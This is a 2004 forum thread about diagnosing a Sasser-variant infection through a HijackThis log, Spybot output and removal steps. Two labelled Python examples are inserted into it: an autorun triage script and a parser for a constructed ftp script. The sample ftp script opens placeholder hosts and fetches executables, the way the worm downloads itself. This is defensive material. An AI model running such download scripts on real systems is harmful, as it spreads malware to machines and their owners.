Emuforums.com

May 30th, 2004   #1
Mad
I got this file running at startup....

I've got this "wkssvr.exe" set to run on startup.
I don't know what it is, but my PC has been acting strange since yesterday.

I found it in the registry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Microsoft Updates"="wkssvr.exe"

Is it a virus or something like that?
__________________
[WinXP SP3] [Gigabyte GA-M61PM-S2] [Athlon64 X2 3800+ @2.00Ghz] [XFX Geforce 8600GT XxX 256MB DDR3] [17" SyncMaster 753v] [Samsung SATA II HD250HJ 250GB] [Kingston 2x1GB DDR2 6400@800MHz CL6] [Samsung CDDVDW SH-S203B] [NVIDIA nForce Networking] [Realtek HD Audio ALC883]
Baldurs Gate Dumps
May 30th, 2004   #2
Squigi63
Sounds like a virus. I tried Google but it pulled up no results and only said it was spelled wrong, so either you have it spelled wrong or it's very new! Have you tried a virus scan? If you don't have one, get free AVG off grisoft.com; it's free and works well.
May 30th, 2004   #3
RF
Run Trend-Micro's HouseCall:
http://housecall.trendmicro.com/hous...start_corp.asp

Make sure it isn't in your startup folder. Then go Start -> Run -> msconfig, hit the Startup tab, and uncheck your program. If that fails, go Start -> Run -> services.msc. Find the service and stop/disable it.
May 31st, 2004   #4
Mad
I managed to take it away for only a few minutes. I tried Norton Corporate 8.11, Ad-aware 6, msconfig, regedit. The damn thing keeps coming back. Now it's wkssvrs.exe.
Is there any way I can send this file to antivirus makers?
May 31st, 2004   #5
RZetlin
I did some checking.

Try and look under the directory C:\WINDOWS\System32 for the wkssvr.exe file.

I'm still determining if wkssvr.exe is a virus or not.
__________________


AMD Athlon 64 3700+ | 2 GB RAM | XFX Nvidia 6800 GS 256 MB XXX Edition | Win XP Pro SP2
May 31st, 2004   #6
Marbles
Just looking at the name, it looks like some sort of "server" program. Maybe something to do with MS Works.

But it could also be a new trojan. A lot of trojan infections are a 2 or 3 part process. You get a small file off a site, or an attachment. It "phones home" for at least one more program. Eventually one of the "phone home" downloaded programs will install the files and registry entries needed to fully infect the system. When you get rid of the start-up file/entry, the other program just re-instates everything. That's most likely why it keeps coming back on you.

Try to remember everything you did the boot before you noticed the program starting at boot up.

If you have any updaters set to automatic, this is a good reason (and why I disable them) for manually updating instead. There's no way of knowing where a file has come from with updaters set to auto. It could be a legit MS or Norton file received through an auto-update, or it could be a virus/trojan.
__________________

XP 2500+ Mobile @200x12=2.4ghz 1.65v
Soltek SL-75FRN2 matched 256mb 3700DDR sticks
ATI 9800 Pro on a 19" NEC MultiSync FE991sb
SBLive 5.1 & Altec Lansing 251 5.1 speakers
Segate 40gig 2mb booting Windows XP Home
Western Digital 80 gig 8mb 3/4 filled with games
Sony DDU 1621 & LG GCE 8525B



XP 1600+ ASUS A7V266-E 512mbs 2100 DDR
GF4 Ti4400 & 2 Voodoo 2 12mb SLI mode on a 17" Flat
WinXP & Win98SE on removable trays plus 2 60gig drives
Liteon LDW-451S
June 1st, 2004   #7
RZetlin
Run HijackThis and post up the log.
June 1st, 2004   #8
Mad
Logfile of HijackThis v1.97.7
Scan saved at 00:23:03, on 1/6/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\ARQUIV~1\SYMANT~1\SYMANT~1\DefWatch.exe
C:\ARQUIV~1\SYMANT~1\SYMANT~1\Rtvscan.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\Arquivos de programas\Analog Devices\SoundMAX\SMAgent.exe
C:\ARQUIV~1\SYMANT~1\SYMANT~1\vptray.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Arquivos de programas\VCool_18b10\VCool.exe
C:\WINDOWS\System32\rundll32.exe
C:\Arquivos de programas\RBTray\RBTRAY.EXE
C:\Arquivos de programas\MYIE2\MyIE.exe
C:\Arquivos de programas\GetRight\getright.exe
C:\Arquivos de programas\GetRight\getright.exe
C:\WINDOWS\System32\taskmgr.exe
C:\WINDOWS\system32\cmd.exe
C:\WINDOWS\system32\tftp.exe
D:\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://allneedsearch.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://allneedsearch.com/
O1 - Hosts: 200.151.192.5 connect.muonline.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Arquivos de programas\Adobe\Acrobat 5.0\Acrobat\ActiveX\AcroIEHelper.ocx
O3 - Toolbar: &Rádio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [vptray] C:\ARQUIV~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [RivaTunerStartupDaemon] "C:\Arquivos de programas\RivaTuner2.0_12\RivaTuner.exe" /S
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE NvQTwk,NvCplDaemon initialize
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Microsoft Updates] wkssvr.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] wkssvr.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - Startup: VCool.lnk = C:\Arquivos de programas\VCool_18b10\VCool.exe
O4 - Startup: RBTRAY.lnk = C:\Arquivos de programas\RBTray\RBTRAY.EXE
O8 - Extra context menu item: Add to Ad Hunter - C:\Arquivos de programas\MYIE2\config/blacklist.htm
O8 - Extra context menu item: Download with GetRight - C:\Arquivos de programas\GetRight\GRdownload.htm
O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\ARQUIV~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Open with GetRight Browser - C:\Arquivos de programas\GetRight\GRbrowse.htm
O9 - Extra 'Tools' menuitem: Sun Java Console (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: Messenger (HKLM)
O12 - Plugin for .spop: C:\Arquivos de programas\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: SEARCH_PAGE_URL=&http://home.microsoft.com/intl/br/access/allinone.asp
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/s...sh/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{EBECC916-D4C4-4C90-9E97-F4453BF3DCA0}: NameServer = 200.225.159.124 200.225.159.126
June 1st, 2004   #9
Mad
More info, from Spybot:

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-21-1214440339-725345543-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3


--- Spybot - Search && Destroy version: 1.3 ---
2004-05-12 Includes\Cookies.sbi
2004-05-12 Includes\Dialer.sbi
2004-05-12 Includes\Hijackers.sbi
2004-05-12 Includes\Keyloggers.sbi
2004-05-12 Includes\LSP.sbi
2004-05-12 Includes\Malware.sbi
2004-05-12 Includes\Revision.sbi
2004-05-12 Includes\Security.sbi
2004-05-12 Includes\Spybots.sbi
2004-05-12 Includes\Tracks.uti
2004-05-12 Includes\Trojans.sbi

AND YES, my brother just told me he was browsing for PORN!! 2nd time!!

What should I do now? I already ran Norton, Ad-aware, HijackThis, SpywareBlaster and Spybot. I clean it, but Spybot always gets it back, the info above.
June 1st, 2004   #10
RZetlin
You should have run Spybot Search & Destroy in the first place.

(Smack your brother in the head as well)

Use HijackThis to remove the following lines:

O4 - HKLM\..\Run: [Microsoft Updates] wkssvr.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] wkssvr.exe

Also remove these items as well.

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://allneedsearch.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://allneedsearch.com/spm.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://allneedsearch.com/
O1 - Hosts: 200.151.192.5 connect.muonline.com

Which items come back when you remove them?
Last edited by RZetlin; June 1st, 2004 at 12:25.
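Added example, not from any poster in this thread: a small Python triage of HijackThis O4 lines that scores the signals visible in the log from post #8 (a bare file name with no path, the same entry registered under more than one autorun key, and a vendor-sounding value name). The sample lines are copied from that log; the scoring rules and function names are assumptions for illustration, not HijackThis behaviour.

```python
import re
from collections import defaultdict

# O4 lines copied from the HijackThis log in post #8.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [vptray] C:\ARQUIV~1\SYMANT~1\SYMANT~1\vptray.exe
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Microsoft Updates] wkssvr.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] wkssvr.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe
O4 - Startup: VCool.lnk = C:\Arquivos de programas\VCool_18b10\VCool.exe
"""

# Registry autoruns look like: O4 - HKLM\..\Run: [value name] command line
O4_RE = re.compile(r"^O4 - (HK\w+)\\\.\.\\(\w+): \[([^\]]+)\] (.+)$")
# Program image: a quoted path, else text up to the first executable extension.
IMAGE_RE = re.compile(r'"([^"]+)"|(.+?\.(?:exe|com|scr|pif|bat))(?=\s|$)|(\S+)', re.I)
VENDOR_RE = re.compile(r"microsoft|windows", re.I)  # assumed list of borrowed names


def parse_o4(log_text):
    """Yield (hive, key, value_name, command) for each registry autorun line."""
    for line in log_text.splitlines():
        m = O4_RE.match(line.strip())
        if m:  # Startup-folder lines ("O4 - Startup: ...") are skipped here
            yield m.groups()


def image_of(command):
    """Return the program part of an autorun command line."""
    m = IMAGE_RE.match(command.strip())
    return next(g for g in m.groups() if g)


def triage(log_text):
    """Return flagged autoruns, most reasons first. Reasons are hints, not verdicts."""
    keys = defaultdict(set)
    for hive, key, name, command in parse_o4(log_text):
        keys[(name, command)].add(hive + "\\" + key)
    findings = []
    for (name, command), where in keys.items():
        image = image_of(command)
        bare = "\\" not in image and "/" not in image
        reasons = []
        if bare:
            reasons.append("bare file name: the search path decides what runs")
        if len(where) > 1:
            reasons.append("registered under " + ", ".join(sorted(where)))
        if bare and VENDOR_RE.search(name):
            reasons.append("vendor-sounding value name without a full path")
        if reasons:
            findings.append({"name": name, "command": command, "reasons": reasons})
    return sorted(findings, key=lambda f: -len(f["reasons"]))


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["name"], "->", f["command"])
        for r in f["reasons"]:
            print("   -", r)
```

A legitimate entry such as nwiz.exe also trips the bare-name rule, which is why the output is ranked by number of reasons instead of treated as a verdict.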
June 1st, 2004   #11
Mad
These 2:
O4 - HKLM\..\Run: [Microsoft Updates] wkssvr.exe
O4 - HKLM\..\RunServices: [Microsoft Updates] wkssvr.exe

And the 4 from Spybot. As soon as it finishes the search, if I do it, the entries are back. I'll have to format my PC, seems to be the only way out.... I already mailed the guys from Spybot, waiting for a response.

Oh, and some files are run randomly, mostly FTP.exe, CMD.exe, LOCATOR.exe, and TFTP.exe.
June 2nd, 2004   #12
WEXP
Sounds like a virus to me. Microsoft often puts "ms" in front of filenames (but not always). Try booting your computer in safe mode and then remove the keys.
June 2nd, 2004   #13
KujaX
Or get Spybot Search & Destroy to disable the file at startup; you would need to load the advanced one.
June 2nd, 2004   #14
Mad
Hmm, didn't try safe mode.
Thx, I'll do it now.
I found this, digging in the Windows folder.
Attached image: ks.jpg (79.5 KB)
June 4th, 2004   #15
Mad
I've found some more info on the net, in case anyone else has the same problem:
http://www.broadbandreports.com/foru...=flat#10413739
June 4th, 2004   #16
Mad
I found the files and submitted them to Symantec; hope they come up with an easy solution quickly.
It's a variant of the damn Sasser. It opens a tftp.exe connection and downloads itself to the PC. I just don't know how it keeps running on my system; it must have changed some service or original .exe.
Here's the content of cmd.ftp, the file which gives the directions for downloading the Sasser:

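Added example, not from any poster in this thread: a Python parser for an ftp command script shaped like the cmd.ftp Mad describes (open host port, anonymous, bin, get file, bye), turning it into host/port/file records for firewall blocks or log searches, including blocks that open a host but never fetch anything. The sample script is constructed, with documentation-range addresses and made-up file names; the function names are assumptions.

```python
import ipaddress
from collections import Counter

# Constructed sample in the shape of the posted cmd.ftp. Addresses come from the
# RFC 5737 documentation ranges and the file names are made up.
SAMPLE_SCRIPT = """\
open 192.0.2.10 5554
anonymous
bin
get 1111_up.exe
bye
open 198.51.100.7 1023
anonymous
open 203.0.113.5 5554
anonymous
bin
get 2222_up.exe
bye
open 192.0.2.44 1023
anonymous
bin
get 3333_upload.exe
bye
"""


def parse_ftp_script(text):
    """Return one record per 'open' block; 'file' stays None if nothing was fetched."""
    sessions, current = [], None
    for raw in text.splitlines():
        parts = raw.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            if current is not None:      # previous block never reached 'bye'
                sessions.append(current)
            try:                          # normalise literal addresses
                host = str(ipaddress.ip_address(parts[1]))
            except ValueError:            # a host name, keep it as written
                host = parts[1]
            port = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
            current = {"host": host, "port": port, "file": None}
        elif current is not None and verb == "get" and len(parts) >= 2:
            current["file"] = parts[1]
        elif current is not None and verb in ("bye", "quit"):
            sessions.append(current)
            current = None
    if current is not None:
        sessions.append(current)
    return sessions


def indicators(sessions):
    """Summarise sessions into values usable in firewall rules and log searches."""
    return {
        "endpoints": sorted({(s["host"], s["port"]) for s in sessions}),
        "ports": dict(Counter(s["port"] for s in sessions)),
        "files": sorted(s["file"] for s in sessions if s["file"]),
        "no_download": sum(1 for s in sessions if s["file"] is None),
    }


if __name__ == "__main__":
    print(indicators(parse_ftp_script(SAMPLE_SCRIPT)))
```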
June 4th, 2004   #17
Quark
If it's a Sasser variant, then you must patch your computer before cleaning the virus. It'll simply keep coming back. Go to windowsupdate.com and make sure you download all the Critical Updates.
June 5th, 2004   #18
MrTeamWork
Once you clean up this poopy, make sure you punish your brother for surfing for porn. If you surf for porn on the net, you best be sure you have a working firewall that is set up right, a powerful anti-virus program or 2, and cross-checking with Ad-aware and Spybot.
June 5th, 2004   #19
Metalmurphy
Hmm, Mad... I was gonna post something I found out in another forum... but looking at those screenshots it seems that it was you that posted on another forum! Tried looking in Symantec but didn't see any info on it! Gonna search a little deeper.
June 5th, 2004   #20
Marbles
Quote:
Originally Posted by MrTeamWork
Once you clean up this poopy, make sure you punish your brother for surfing for porn.
Punish? I'd just make it impossible for the SOB to use the computer, period. Password, chop off his hands, whatever it would take.